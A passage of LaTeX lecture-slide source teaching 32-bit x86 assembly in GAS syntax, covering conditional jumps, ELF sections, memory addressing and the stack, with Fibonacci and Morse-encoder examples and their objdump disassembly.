 629 |         \item Naturally, they often have the same name...
 630 |         \vs
 631 |         \pause
 632 |         \item GAS supports the syntax {\ttfamily <mnemonic><size>} \\ to unambiguously encode the correct instruction \\
 633 | \begin{textcode}
 634 | movb $0xff, %al   movw %bx, %ax    movl memAddr, %eax
 635 | incb %ah          incw %ax         incl %eax
 636 | \end{textcode}
 637 |     \end{itemize}
 638 | \end{itemize}
 639 | \begin{center}
 640 | \begin{tabular}{c|c|c}
 641 | \textbf{Name} & \textbf{Size} & \textbf{GAS Suffix} \\
 642 | \hline \hline
 643 | byte & 8-bits & b \\
 644 | word & 16-bits & w \\
 645 | dword & 32-bits & l \\
 646 | qword & 64-bits & q \\
 647 | \end{tabular}
 648 | \end{center}
 649 | \end{frame}
 650 | 
 651 | \section{Basic Tools}
 652 | \begin{frame}[fragile,t]
 653 | \frametitle{Common Invocations}
 654 | \begin{itemize}
 655 |     \item Assemble: {\ttfamily as prog.asm -o prog.o}
 656 |     \item Link directly: {\ttfamily ld prog.o -o prog}
 657 |     \item Link with libc: {\ttfamily gcc prog.o -o prog}
 658 |     \item Disassemble: {\ttfamily objdump -D prog}
 659 |     \item View Sections: {\ttfamily objdump -x prog}
 660 |     \item View Symbols: {\ttfamily nm prog}
 661 |     \item Debug Disassembly: {\ttfamily gdb prog}
 662 |     \begin{itemize}
 663 |         \item Step instruction: {\ttfamily si}
 664 |         \item Disassembly layout: {\ttfamily layout asm}
 665 |         \item Set breakpoint at symbol: {\ttfamily b \_start}
 666 |         \item Set breakpoint at address: {\ttfamily b * 0x80001230}
 667 |         \item View CPU registers: {\ttfamily info reg}
 668 |         \item Disassemble next three instructions: {\ttfamily x/3i \$eip}
 669 |         \item View five dwords of memory starting at {\ttfamily \$esp}: {\ttfamily x/5w \$esp}
 670 |         \item View five bytes of memory starting at {\ttfamily 0xbffffff0}: {\ttfamily x/5b 0xbffffff0}
 671 |     \end{itemize}
 672 | \end{itemize}
 673 | \end{frame}
 674 | 
 675 | \section{Topic 3: Flow Control}
 676 | 
 677 | \begin{frame}[fragile,t]
 678 | \frametitle{Modifying Flow of Execution}
 679 | \mvs
 680 | \begin{itemize}
 681 |   \item With most instructions, CPU will increment {\ttfamily \%eip} by the executed instruction size to proceed to the next immediate instruction
 682 | \end{itemize}
 683 | \begin{gascode}
 684 | a_label:
 685 |   nop
 686 |   addl $5, %eax         # %eax = %eax + 5
 687 |   xorl %ecx, %ebx       # %ebx = %ebx ^ %ecx
 688 | 
 689 | another_label:
 690 |   nop
 691 |   nop
 692 | \end{gascode}
 693 | \pause
 694 | \begin{itemize}
 695 |   \item The unconditional {\ttfamily jmp <label>} instruction allows us to explicitly change {\ttfamily \%eip} to another address, and continue execution from there
 696 | \end{itemize}
 697 | \begin{gascode}
 698 | a_label:
 699 |   nop
 700 |   addl $5, %eax         # %eax = %eax + 5
 701 |   jmp somewhere_else    # Jump to somewhere_else
 702 | 
 703 | another_label:
 704 |   ...                   # We just skipped over all of this
 705 | 
 706 | somewhere_else:
 707 |   xorl %ecx, %ebx       # %ebx = %ebx ^ %ecx
 708 | \end{gascode}
 709 | \end{frame}
 710 | 
 711 | \begin{frame}[fragile,t]
 712 | \frametitle{Modifying Flow of Execution Conditionally}
 713 | \begin{itemize}
 714 |   \item Certain instructions will set boolean bit flags in the {\ttfamily \%eflags} registers based on the result
 715 |   \begin{itemize}
 716 |     \item Implicitly, based on result of an arithmetic instruction
 717 |     \item Explicitly, with {\ttfamily cmp} or {\ttfamily test} between two operands
 718 |   \end{itemize}
 719 |   \item Flags are the basis of flow control with conditional jumps, which \\ update {\ttfamily \%eip} to a relative offset if an {\ttfamily \%eflags} flag is set
 720 | \end{itemize}
 721 | \mvs
 722 | \begin{figure}
 723 | \centering
 724 |   \includegraphics[width=\textwidth]{figures/eflags.png} \\
 725 |   \vs
 726 |   \includegraphics[height=0.3\paperheight]{figures/ia32-eflags.png}\let\thefootnote\relax\footnote{Intel 64 and IA-32 Architectures Software Developer’s Manual Vol. 1, A-1}
 727 | \end{figure}
 728 | \end{frame}
 729 | 
 730 | \begin{frame}[fragile,t]
 731 | \frametitle{Conditional Jumps}
 732 | \mvs
 733 | \begin{table}[h]\scriptsize
 734 | \begin{tabular}{l|c|c}
 735 |   \textbf{Instruction} & \textbf{\%eflags Condition} &  \textbf{Description} \\
 736 |   \hline
 737 |   {\ttfamily jmp <label>} & - & Unconditional Jump \\
 738 |   \textbf{Unsigned Conditional Jumps} & & \\
 739 |   \hline
 740 |   {\ttfamily ja / jnbe <label>} & (CF or ZF) = 0 & Above / Not below or equal \\
 741 |   {\ttfamily jae / jnb <label>} & CF = 0 & Above or equal / Not below \\
 742 |   {\ttfamily jb / jnae <label>} & (CF or ZF) = 1 & Below / Not above or equal \\
 743 |   {\ttfamily jc <label>} & CF = 1 & Carry \\
 744 |   {\ttfamily je/jz <label>} & ZF = 1 & Equal / Zero \\
 745 |   {\ttfamily jnc <label>} & CF = 0 & Not Carry \\
 746 |   {\ttfamily jne/jnz <label>} & ZF = 0 & Not Equal / Not Zero \\
 747 |   \textbf{Signed Conditional Jumps} & & \\
 748 |   \hline
 749 |   {\ttfamily jg / jnle <label>} & ((SF xor OF) or ZF) = 0 & Greater / Not Less or Equal\\
 750 |   {\ttfamily jge / jnl <label>} & (SF xor OF) = 0 & Greater or Equal / Not Less\\
 751 |   {\ttfamily jl / jnge <label>} & (SF xor OF) = 1 & Less / Not Greater or Equal \\
 752 |   {\ttfamily jle / jng <label>} & ((SF xor OF) or ZF) = 1 & Less or Equal / Not Greater \\
 753 |   {\ttfamily jno <label>} & OF = 0 & Not overflow \\
 754 |   {\ttfamily jns <label>} & SF = 0 & Not sign (non-negative) \\
 755 |   {\ttfamily jo <label>} & OF = 1 & Overflow \\
 756 |   {\ttfamily js <label>} & SF = 1 & Sign (negative) \\
 757 | \end{tabular}
 758 | \end{table} \let\thefootnote\relax\footnote{Intel 64 and IA-32 Architectures Software Developer’s Manual Vol. 1, 7-23}
 759 | \end{frame}
 760 | 
 761 | \begin{frame}[fragile,t]
 762 | \frametitle{Example Conditional Jumps (example-cond-jmp.S)}
 763 | \mvs
 764 | \begin{gascode}
 765 | .section .text
 766 |   # cmpl %oper1, %oper2
 767 |   # updates flags based on result of %oper2 - %oper1
 768 |   cmpl %eax, %ecx
 769 |   cmpl $0xFF, %eax
 770 | 
 771 |   # conditional jumps
 772 |   je label_foo    # jump if %oper2 == %oper1
 773 |   jg label_bar    # jump if %oper2 > %oper1
 774 |   jl label_xyz    # jump if %oper2 < %oper1
 775 | 
 776 |   # test %oper1, %oper2
 777 |   # updates flags based on result of %oper2 & %oper1
 778 |   testl %eax, %ecx
 779 |   testl $0x1F, %eax
 780 | 
 781 |   # arithmetic
 782 |   # updates flags based on result
 783 |   addl %eax, %ebx
 784 |   incl %eax
 785 |   decl %ebx
 786 | \end{gascode}
 787 | \end{frame}
 788 | 
 789 | \begin{frame}[fragile,t]
 790 | \frametitle{Example Conditional Jumps (example-cond-jmp.S) Continued}
 791 | \mvs
 792 | \begin{gascode}
 793 |   # labels are just symbols containing an address to make
 794 |   # it easy to specify addresses
 795 |   label1:
 796 |   label2:
 797 |     movl $0, %eax   # %eax = 0
 798 |     incl %eax       # %eax++ ; ZF set to 0!
 799 |     jz label1       # Jump if ZF = 1 (not taken)
 800 |     jnz label3      # Jump if ZF = 0 (taken)
 801 |     decl %eax       # I won't be executed
 802 |   label3:
 803 |     nop
 804 |     nop             # Execution will fall
 805 |   label4:           # through label4
 806 |     jmp label1      # Jump back to label1
 807 | 
 808 |   # Loops
 809 |   movl $10, %eax
 810 |   loop:
 811 |     nop
 812 |     decl %eax
 813 |     jnz loop
 814 | 
 815 |   # Direct Comparison
 816 |   cmpl $0x05, %eax
 817 |   je label_foo      # Jump to label_foo if %eax == 5
 818 | \end{gascode}
 819 | \end{frame}
 820 | 
 821 | \begin{frame}[fragile,t]
 822 | \frametitle{Example Conditional Jumps (example-cond-jmp.S) Disassembly}
 823 | \mvs
 824 | \begin{customobjdumpcode}
 825 | $ as example-cond-jmp.S -o example-cond-jmp.o
 826 | $ ld example-cond-jmp.o -o example-cond-jmp
 827 | $ objdump -D example-cond-jmp
 828 | 
 829 | Disassembly of section .text:
 830 | 
 831 | 08048054 <_start>:
 832 |  8048054: 39 c1                 cmp    %eax,%ecx
 833 |  8048056: 3d ff 00 00 00        cmp    $0xff,%eax
 834 |  804805b: 74 2c                 je     8048089 <label_foo>
 835 |  804805d: 7f 2b                 jg     804808a <label_bar>
 836 |  804805f: 7c 2a                 jl     804808b <label_xyz>
 837 |  8048061: 85 c1                 test   %eax,%ecx
 838 |  8048063: a9 1f 00 00 00        test   $0x1f,%eax
 839 |  8048068: 01 c3                 add    %eax,%ebx
 840 |  804806a: 40                    inc    %eax
 841 |  804806b: 4b                    dec    %ebx
 842 | 
 843 | ...
 844 | \end{customobjdumpcode}
 845 | \end{frame}
 846 | 
 847 | \begin{frame}[fragile,t]
 848 | \frametitle{Example Conditional Jumps (example-cond-jmp.S) Disassembly}
 849 | \mvs
 850 | \begin{customobjdumpcode}
 851 | 0804806c <label1>:
 852 |  804806c: b8 00 00 00 00        mov    $0x0,%eax
 853 |  8048071: 40                    inc    %eax
 854 |  8048072: 74 f8                 je     804806c <label1>
 855 |  8048074: 75 01                 jne    8048077 <label3>
 856 |  8048076: 48                    dec    %eax
 857 | 08048077 <label3>:
 858 |  8048077: 90                    nop
 859 |  8048078: 90                    nop
 860 | 08048079 <label4>:
 861 |  8048079: eb f1                 jmp    804806c <label1>
 862 |  804807b: b8 0a 00 00 00        mov    $0xa,%eax
 863 | 08048080 <loop>:
 864 |  8048080: 90                    nop
 865 |  8048081: 48                    dec    %eax
 866 |  8048082: 75 fc                 jne    8048080 <loop>
 867 |  8048084: 83 f8 05              cmp    $0x5,%eax
 868 |  8048087: 74 00                 je     8048089 <label_foo>
 869 | 
 870 | ...
 871 | \end{customobjdumpcode}
 872 | \end{frame}
 873 | 
 874 | \section{Program Example: Iterative Fibonacci}
 875 | \begin{frame}[fragile,t]
 876 | \frametitle{Iterative Fibonacci (fibonacci.S)}
 877 | \mvs
 878 | \begin{gascode}
 879 | .section .text
 880 | .global main
 881 | main:
 882 |   movl $0, %ecx     # f_n-2 = 0
 883 |   movl $1, %ebx     # f_n-1 = 1
 884 |   movl $1, %eax     # f_n   = 1
 885 |   movl $12, %edi    # Number of integers to compute
 886 | 
 887 |   fib_loop:
 888 |     # Print %eax
 889 |     call myprint
 890 | 
 891 |     movl %ebx, %ecx   # f_n-1 -> f_n-2
 892 |     movl %eax, %ebx   # f_n   -> f_n-1
 893 |     addl %ecx, %eax   # New f_n = Old f_n + f_n-2
 894 | 
 895 |     # Decrement %edi
 896 |     decl %edi
 897 |     jnz fib_loop
 898 | 
 899 |   ret
 900 | 
 901 | myprint:
 902 |   ...
 903 | \end{gascode}
 904 | \end{frame}
 905 | 
 906 | \begin{frame}[fragile,t]
 907 | \frametitle{Iterative Fibonacci (fibonacci.S) Output}
 908 | \mvs
 909 | \begin{textcode}
 910 | $ as fibonacci.S -o fibonacci.o
 911 | $ gcc fibonacci.o -o fibonacci   # (Easy way to link with libc,
 912 |                                  #  more on this, later)
 913 | $ ./fibonacci
 914 | 1
 915 | 2
 916 | 3
 917 | 5
 918 | 8
 919 | 13
 920 | 21
 921 | 34
 922 | 55
 923 | 89
 924 | 144
 925 | 233
 926 | $
 927 | \end{textcode}
 928 | \end{frame}
 929 | 
 930 | \begin{frame}[fragile,t]
 931 | \frametitle{Iterative Fibonacci (fibonacci.S) Disassembly}
 932 | \mvs
 933 | \begin{customobjdumpcode}
 934 | $ objdump -D fibonacci
 935 | 
 936 | Disassembly of section .text:
 937 | ...
 938 | 
 939 | 080483e4 <main>:
 940 |  80483e4: b9 00 00 00 00        mov    $0x0,%ecx
 941 |  80483e9: bb 01 00 00 00        mov    $0x1,%ebx
 942 |  80483ee: b8 01 00 00 00        mov    $0x1,%eax
 943 |  80483f3: bf 0c 00 00 00        mov    $0xc,%edi
 944 | 
 945 | 080483f8 <fib_loop>:
 946 |  80483f8: e8 0a 00 00 00        call   8048407 <myprint>
 947 |  80483fd: 89 d9                 mov    %ebx,%ecx
 948 |  80483ff: 89 c3                 mov    %eax,%ebx
 949 |  8048401: 01 c8                 add    %ecx,%eax
 950 |  8048403: 4f                    dec    %edi
 951 |  8048404: 75 f2                 jne    80483f8 <fib_loop>
 952 |  8048406: c3                    ret
 953 | 
 954 | ...
 955 | \end{customobjdumpcode}
 956 | \begin{itemize}
 957 |   \item Main code is only 35 bytes!
 958 |   \item Can easily be cut down to 28 bytes by optimizing the clears
 959 | \end{itemize}
 960 | \end{frame}
 961 | 
 962 | \section{Topic 4: Program Memory}
 963 | 
 964 | \begin{frame}[fragile,t]
 965 | \frametitle{Static Allocation in C}
 966 | \begin{itemize}
 967 |   \item From C, we're used to uninitialized and initialized static memory allocations
 968 | \end{itemize}
 969 | \vs
 970 | \begin{ccode}
 971 | /* Uninitialized static allocation, read-write */
 972 | char buff[1024];
 973 | /* Initialized static allocations, read-write */
 974 | int foo = 5;
 975 | char str[] = "Hello World";
 976 | \end{ccode}
 977 | \pause
 978 | \begin{ccode}
 979 | 
 980 | /* Trickier example: */
 981 | char *p = "Hello World";
 982 | /* char *p is an initialized static allocation, read-write */
 983 | /* "Hello World" is initialized static allocation, READ-ONLY */
 984 | 
 985 | int main(void) {
 986 |   return 0;
 987 | }
 988 | \end{ccode}
 989 | \end{frame}
 990 | 
 991 | \begin{frame}[fragile,t]
 992 | \frametitle{Static Allocation in Assembly}
 993 | \begin{itemize}
 994 |   \item Responsible for manually specifying the contents of memory
 995 |   \item Description is stored in a binary format like ELF, \\ in terms of sections, r/w/x permissions, and sizes
 996 |   \item OS is responsible for setting up memory as described in ELF binary in {\ttfamily execve()}
 997 |   \pause
 998 |   \vs\vs\vs
 999 |   \item {\ttfamily section \textbf{.text}}: \textbf{read-only executable} program instructions
1000 |   \item {\ttfamily section \textbf{.rodata}}: initialized statically allocated \textbf{read-only data}
1001 |   \item {\ttfamily section \textbf{.data}}: initialized statically allocated \textbf{read-write data}
1002 |   \item {\ttfamily section \textbf{.bss}}: uninitialized statically allocated \textbf{read-write data}
1003 | \end{itemize}
1004 | \end{frame}
1005 | 
1006 | \begin{frame}[fragile,t]
1007 | \frametitle{Memory Layout}
1008 | \mvs
1009 | \begin{figure}
1010 | \centering
1011 | \includegraphics[height=0.75\paperheight]{figures/memlayout.png}
1012 | \end{figure}
1013 | \end{frame}
1014 | 
1015 | \begin{frame}[fragile,t]
1016 | \frametitle{Example Static Allocation (example-static-alloc.S)}
1017 | \mvs
1018 | \begin{gascode}
1019 | # Put some instructions in .text
1020 | .section .text
1021 | _start:
1022 |   nop
1023 |   nop
1024 |   nop
1025 |   nop
1026 | 
1027 | # Put a string in .rodata
1028 | .section .rodata
1029 |   anotherStr:   .ascii "Another string\n\0"
1030 | 
1031 | # Put some magic bytes in .data
1032 | .section .data
1033 |   magicByte1:   .byte 0xaa
1034 |   magicBytes2:  .byte 0x55, 0x10
1035 |   magicDWord:   .long 0xdeadbeef
1036 |   magicStr:     .ascii "String!\0"
1037 | 
1038 | # Reserve 1024 uninitialized bytes in .bss
1039 | .section .bss
1040 |   .comm Buffer, 1024
1041 | \end{gascode}
1042 | \end{frame}
1043 | 
1044 | \begin{frame}[fragile,t]
1045 | \frametitle{Example Static Allocation (example-static-alloc.S) Disassembly}
1046 | \mvs
1047 | \begin{customobjdumpcode}
1048 | $ as example-static-alloc.S -o example-static-alloc.o
1049 | $ ld example-static-alloc.o -o example-static-alloc
1050 | $ objdump -D example-static-alloc
1051 | 
1052 | Disassembly of section .text:
1053 | 
1054 | 08048074 <_start>:
1055 |  8048074: 90                    nop 
1056 |  8048075: 90                    nop 
1057 |  8048076: 90                    nop 
1058 |  8048077: 90                    nop 
1059 | 
1060 | Disassembly of section .rodata:
1061 | 
1062 | 08048078 <anotherStr>:
1063 |  8048078: 41                    inc    %ecx
1064 |  8048079: 6e                    outsb  %ds:(%esi),(%dx)
1065 |  804807a: 6f                    outsl  %ds:(%esi),(%dx)
1066 |  804807b: 74 68                 je     80480e5 <anotherStr+0x6d>
1067 |  804807d: 65                    gs
1068 |  804807e: 72 20                 jb     80480a0 <anotherStr+0x28>
1069 |  8048080: 73 74                 jae    80480f6 <anotherStr+0x7e>
1070 |  8048082: 72 69                 jb     80480ed <anotherStr+0x75>
1071 |  8048084: 6e                    outsb  %ds:(%esi),(%dx)
1072 |  8048085: 67 0a 00              or     (%bx,%si),%al
1073 | \end{customobjdumpcode}
1074 | \end{frame}
1075 | 
1076 | \begin{frame}[fragile,t]
1077 | \frametitle{Example Static Allocation (example-static-alloc.S) Disassembly}
1078 | \mvs
1079 | \begin{customobjdumpcode}
1080 | Disassembly of section .data:
1081 | 
1082 | 08049088 <magicByte1>:
1083 |  8049088: aa                    stos   %al,%es:(%edi)
1084 | 08049089 <magicBytes2>:
1085 |  8049089: 55                    push   %ebp
1086 |  804908a: 10 ef                 adc    %ch,%bh
1087 | 0804908b <magicWord>:
1088 |  804908b: ef                    out    %eax,(%dx)
1089 |  804908c: be ad de 53 74        mov    $0x7453dead,%esi
1090 | 0804908f <magicStr>:
1091 |  804908f: 53                    push   %ebx
1092 |  8049090: 74 72                 je     8049104 <Buffer+0x64>
1093 |  8049092: 69                    .byte 0x69
1094 |  8049093: 6e                    outsb  %ds:(%esi),(%dx)
1095 |  8049094: 67 21 00              and    %eax,(%bx,%si)
1096 | 
1097 | Disassembly of section .bss:
1098 | 
1099 | 080490a0 <Buffer>:
1100 |   ...
1101 | \end{customobjdumpcode}
1102 | \end{frame}
1103 | 
1104 | \begin{frame}[fragile,t]
1105 | \frametitle{Viewing Sections}
1106 | \mvs
1107 | \begin{itemize}
1108 |   \item We can also view the program's sections with {\ttfamily objdump -x}.
1109 | \end{itemize}
1110 | \begin{textcode*}{fontsize=\fontsize{9}{8}}
1111 | $ objdump -x example-static-alloc
1112 | 
1113 | example-static-alloc:     file format elf32-i386
1114 | example-static-alloc
1115 | architecture: i386, flags 0x00000112:
1116 | EXEC_P, HAS_SYMS, D_PAGED
1117 | start address 0x08048074
1118 | 
1119 | Program Header:
1120 |     LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
1121 |          filesz 0x00000088 memsz 0x00000088 flags r-x
1122 |     LOAD off    0x00000088 vaddr 0x08049088 paddr 0x08049088 align 2**12
1123 |          filesz 0x0000000f memsz 0x00000418 flags rw-
1124 | 
1125 | Sections:
1126 | Idx Name          Size      VMA       LMA       File off  Algn
1127 |   0 .text         00000004  08048074  08048074  00000074  2**2
1128 |                   CONTENTS, ALLOC, LOAD, READONLY, CODE
1129 |   1 .rodata       00000010  08048078  08048078  00000078  2**0
1130 |                   CONTENTS, ALLOC, LOAD, READONLY, DATA
1131 |   2 .data         0000000f  08049088  08049088  00000088  2**2
1132 |                   CONTENTS, ALLOC, LOAD, DATA
1133 |   3 .bss          00000400  080490a0  080490a0  00000097  2**4
1134 |                   ALLOC
1135 | ...
1136 | \end{textcode*}
1137 | \end{frame}
1138 | 
1139 | \section{Topic 5: Reading/Writing Memory}
1140 | 
1141 | \begin{frame}[fragile,t]
1142 | \frametitle{Directly Accessing Memory}
1143 | \begin{itemize}
1144 |   \item We've already seen how to directly access memory addresses with their label representations
1145 | \end{itemize}
1146 | \begin{gascode}
1147 | .section .text
1148 |   movl magicDword, %eax     # %eax = *(magicDword)
1149 |   andb byteMask, %al        # %al = %al & *(byteMask)
1150 |   movl %eax, modifiedDword  # *(magicDword) = %eax
1151 | 
1152 | .section .rodata          # Read-only!
1153 |   magicDword: .long 0xffffffff
1154 |   byteMask:   .byte 0x55
1155 | 
1156 | .section .bss             # Uninitialized read-write
1157 |   .comm modifiedDword, 4
1158 | \end{gascode}
1159 | \pause
1160 | \begin{itemize}
1161 |   \item The memory addresses are {\bf directly encoded} in the instructions:
1162 | \end{itemize}
1163 | \begin{customobjdumpcode}
1164 | Disassembly of section .text:
1165 |  8048074: a1 85 80 04 08        mov    0x8048085,%eax
1166 |  8048079: 22 05 89 80 04 08     and    0x8048089,%al
1167 |  804807f: a3 8c 90 04 08        mov    %eax,0x804908c
1168 | \end{customobjdumpcode}
1169 | \end{frame}
1170 | 
1171 | \begin{frame}[fragile,t]
1172 | \frametitle{Indirect Memory Access}
1173 | \begin{itemize}
1174 |   \item Many x86 instructions are capable of complex indirect addressing: \\
1175 |   {\ttfamily {\footnotesize *(base register + (offset register * multiplier) + displacement)}}
1176 |   \item GAS Syntax: \\
1177 |   {\ttfamily {\footnotesize displacement(base register, offset register, multiplier)}}
1178 |   \pause
1179 |   \begin{itemize}
1180 |     \item Base register can be any general purpose register
1181 |     \item Offset register can be any general purpose register except {\ttfamily \%esp}
1182 |     \item Multiplier can be 1, 2, 4, 8
1183 |     \item Displacement is signed, up to 16-bits
1184 |   \end{itemize}
1185 |   \pause
1186 |   \item Not all fields are required. A simplified indirect address: {\ttfamily (\%ebx) }
1187 |   \begin{gascode}
1188 |   movl %eax, 8(%ebx, %ecx, 4)   # *(%ebx + 4*%ecx + 8) = %eax
1189 |   movl %eax, 12(%ebp)           # *(%ebp + 12) = %eax
1190 |   movl %eax, (%ebx)             # *(%ebx) = %eax
1191 |   \end{gascode}
1192 |   \pause
1193 |   \item Makes it easy to address tables/structures
1194 | \end{itemize}
1195 | \end{frame}
1196 | 
1197 | \begin{frame}[fragile,t]
1198 | \frametitle{Example Indirect Memory Access (example-indirect-mem.S)}
1199 | \mvs
1200 | \begin{gascode}
1201 | .section .text
1202 | _start:
1203 |   movl $tableStart, %ebx          # Pointer to table start
1204 |                                   # We are moving the *value*
1205 |                                   # $tableStart, this is not a
1206 |                                   # memory access!
1207 |   movl $0, %ecx
1208 |   loop:
1209 |       movl (%ebx, %ecx, 4), %eax  # %eax = *(%ebx + 4*%ecx)
1210 |       notl %eax                   # %eax = ~%eax
1211 |       movl %eax, (%ebx, %ecx, 4)  # *(%ebx + 4*%ecx) = %eax
1212 |       incl %ecx
1213 |       cmpl $10, %ecx
1214 |       jl loop
1215 | 
1216 | .section .data
1217 |   tableStart: .long 0x00000000, 0x00000001
1218 |               .long 0x00000002, 0x00000003
1219 |               .long 0x00000004, 0x00000005
1220 |               .long 0x00000006, 0x00000007
1221 |               .long 0x00000008, 0x00000009
1222 | \end{gascode}
1223 | \end{frame}
1224 | 
1225 | \begin{frame}[fragile,t]
1226 | \frametitle{Ex. Indirect Memory Access (example-indirect-mem.S) Disassembly}
1227 | \mvs
1228 | \begin{customobjdumpcode}
1229 | $ as example-indirect-mem.S -o example-indirect-mem.o
1230 | $ ld example-indirect-mem.o -o example-indirect-mem
1231 | $ objdump -D example-indirect-mem
1232 | 
1233 | Disassembly of section .text:
1234 | 
1235 | 08048074 <_start>:
1236 |  8048074: bb 90 90 04 08        mov    $0x8049090,%ebx
1237 |  8048079: b9 00 00 00 00        mov    $0x0,%ecx
1238 | 0804807e <loop>:
1239 |  804807e: 8b 04 8b              mov    (%ebx,%ecx,4),%eax
1240 |  8048081: f7 d0                 not    %eax
1241 |  8048083: 89 04 8b              mov    %eax,(%ebx,%ecx,4)
1242 |  8048086: 41                    inc    %ecx
1243 |  8048087: 83 f9 0a              cmp    $0xa,%ecx
1244 |  804808a: 7c f2                 jl     804807e <loop>
1245 |  804808c: 90                    nop
1246 | 
1247 | Disassembly of section .data:
1248 | 
1249 | 08049090 <tableStart>:
1250 |  8049090: 00 00                 add    %al,(%eax)
1251 |  8049092: 00 00                 add    %al,(%eax)
1252 |  8049094: 01 00                 add    %eax,(%eax)
1253 |  8049096: 00 00                 add    %al,(%eax)
1254 |  8049098: 02 00                	add    (%eax),%al
1255 |   ...
1256 | 
1257 | \end{customobjdumpcode}
1258 | \end{frame}
1259 | 
1260 | \section{Program Example: Morse Encoder}
1261 | 
1262 | \begin{frame}[fragile,t]
1263 | \frametitle{Morse Encoder (morse\_encoder.S)}
1264 | \mvs
1265 | \begin{gascode}
1266 | .section .text
1267 | .global main
1268 | main:
1269 | movl $inputWord, %esi       # Pointer to input word
1270 | movl $outputMorse, %edi     # Pointer to output morse
1271 | movl $0, %eax               # Clear %eax
1272 | 
1273 | encode_loop:
1274 |   movb (%esi), %al          # Read the next byte of input to %al
1275 |   incl %esi                 # Increment input word pointer
1276 | 
1277 |   testb %al, %al            # If we encounter a null byte
1278 |   jz finished               #   jump to finished
1279 | 
1280 |   subb $'A, %al             # Adjust %al to be relative to 'A'
1281 | 
1282 |   movl $MorseTable, %ecx    # Initialize %ecx morse table pointer
1283 |   lookup:
1284 |                                 # Read the next code character into %bl
1285 |     movb (%ecx, %eax, 8), %bl   # %bl = *(%ecx + 8*%eax)
1286 | 
1287 |     cmpb $' , %bl               # If we encounter a space
1288 |     je lookup_done              #   break out of the loop
1289 | 
1290 | \end{gascode}
1291 | \end{frame}
1292 | 
1293 | \begin{frame}[fragile,t]
1294 | \frametitle{Morse Encoder (morse\_encoder.S) Continued}
1295 | \mvs
1296 | \begin{gascode}
1297 |     # (inside lookup loop)
1298 | 
1299 |     movb %bl, (%edi)            # Copy the code character to our output morse
1300 |     incl %edi                   # Increment output morse pointer
1301 | 
1302 |     incl %ecx                   # Incerment our table pointer
1303 |     jmp lookup                  # Loop
1304 | 
1305 | lookup_done:
1306 |   movb $' , (%edi)          # Copy a space to the output morse
1307 |   incl %edi                 # Increment output morse pointer
1308 |   movb $' , (%edi)          # ...
1309 |   incl %edi                 # ...
1310 |   movb $' , (%edi)          # ...
1311 |   incl %edi                 # ...
1312 | 
1313 |   jmp encode_loop
1314 | 
1315 | finished:
1316 |   movb $0x00, (%edi)        # Append a null byte to the output morse
1317 |   incl %edi                 # Increment output morse pointer
1318 | \end{gascode}
1319 | \end{frame}
1320 | 
1321 | \begin{frame}[fragile,t]
1322 | \frametitle{Morse Encoder (morse\_encoder.S) Continued}
1323 | \mvs
1324 | \begin{gascode}
1325 | 
1326 |   pushl $outputMorse        # Call puts(outputMorse);
1327 |   call puts
1328 |   addl $4, %esp
1329 | 
1330 |   movl $0, %eax             # Return 0
1331 |   ret
1332 | 
1333 | .section .rodata
1334 |   # Morse code lookup table
1335 |   MorseTable:
1336 |   .ascii ".-      ", "-...    ", "-.-.    ", "-..     " # A, B, C, D
1337 |   .ascii ".       ", "..-.    ", "--.     ", "....    " # E, F, G, H
1338 |   .ascii "..      ", ".---    ", "-.-     ", ".-..    " # I, J, K, L
1339 |   .ascii "--      ", "-.      ", "---     ", ".--.    " # M, N, O, P
1340 |   .ascii "--.-    ", ".-.     ", "...     ", "-       " # Q, R, S, T
1341 |   .ascii "..-     ", "...-    ", ".--     ", "-..-    " # U, V, W, X
1342 |   .ascii "-.--    ", "--..    "                         # Y, Z
1343 | 
1344 | .section .data
1345 |   # Input Word Storage
1346 |   inputWord: .ascii "HELLO\0"
1347 | 
1348 | .section .bss
1349 |   # Output Morse Code Storage
1350 |   .comm outputMorse, 64
1351 | \end{gascode}
1352 | \end{frame}
1353 | 
1354 | \begin{frame}[fragile,t]
1355 | \frametitle{Morse Encoder (morse\_encoder.S) Runtime}
1356 | \mvs
1357 | \begin{textcode}
1358 | $ as morse_encoder.S -o morse_encoder.o
1359 | $ gcc morse_encoder.o -o morse_encoder
1360 | $ ./morse_encoder
1361 | ....   .   .-..   .-..   ---   
1362 | $
1363 | \end{textcode}
1364 | \end{frame}
1365 | 
1366 | \section{Topic 6: Stack}
1367 | 
1368 | \begin{frame}[fragile,t]
1369 | \frametitle{Automatic Allocation in C}
1370 | \begin{itemize}
1371 |   \item From C, we're used to automatic memory allocations in functions and blocks \{ ... \} in general
1372 | \end{itemize}
1373 | \begin{ccode}
1374 | int main(void) {
1375 |   int i;            /* Automatic allocation */
1376 |   char buff[8];     /* Automatic allocation */
1377 | 
1378 |   while (1) {
1379 |     int j;          /* Automatic allocation */
1380 |     ...
1381 |   }
1382 | 
1383 |   return 0;
1384 | }
1385 | \end{ccode}
1386 | \begin{itemize}
1387 |   \item These allocations typically live on the {\bf stack}.
1388 | \end{itemize}
1389 | \end{frame}
1390 | 
1391 | \begin{frame}[fragile,t]
1392 | \frametitle{LIFO Stack Data Structure}
1393 | \begin{figure}
1394 | \centering
1395 | \includegraphics[height=0.60\paperheight]{figures/lifostack.png}
1396 | \end{figure}
1397 | \end{frame}
1398 | 
1399 | \begin{frame}[fragile,t]
1400 | \frametitle{x86 Stack}
1401 | \begin{figure}
1402 | \centering
1403 | \includegraphics[height=0.4\paperheight]{figures/x86stack.png}
1404 | \end{figure}
1405 | \begin{itemize}
1406 |   \item Implemented in hardware with a "stack pointer" {\ttfamily \%esp} \\ and a chunk of memory
1407 |   \item x86 stack is {\bf last in first out}, {\bf descending}, and \\ {\ttfamily \%esp} {\bf points to allocated memory}
1408 |   \item OS sets up valid {\ttfamily \%esp} at program start
1409 | \end{itemize}
1410 | \end{frame}
1411 | 
1412 | \begin{frame}[fragile,t]
1413 | \frametitle{Push to Stack}
1414 | \begin{figure}
1415 | \centering
1416 | \includegraphics[height=0.6\paperheight]{figures/x86stackpush.png}
1417 | \end{figure}
1418 | \begin{itemize}
1419 | \item We can push by adjusting and writing to {\ttfamily \%esp}, \\ or with the atomic {\ttfamily push} instruction
1420 | \end{itemize}
1421 | \end{frame}
1422 | 
1423 | \begin{frame}[fragile,t]
1424 | \frametitle{Pop from Stack}
1425 | \begin{figure}
1426 | \centering
1427 | \includegraphics[height=0.6\paperheight]{figures/x86stackpop.png}
1428 | \end{figure}
1429 | \begin{itemize}
1430 | \item We can push by reading from and adjusting {\ttfamily \%esp}, \\ or with the atomic {\ttfamily pop} instruction
1431 | \end{itemize}
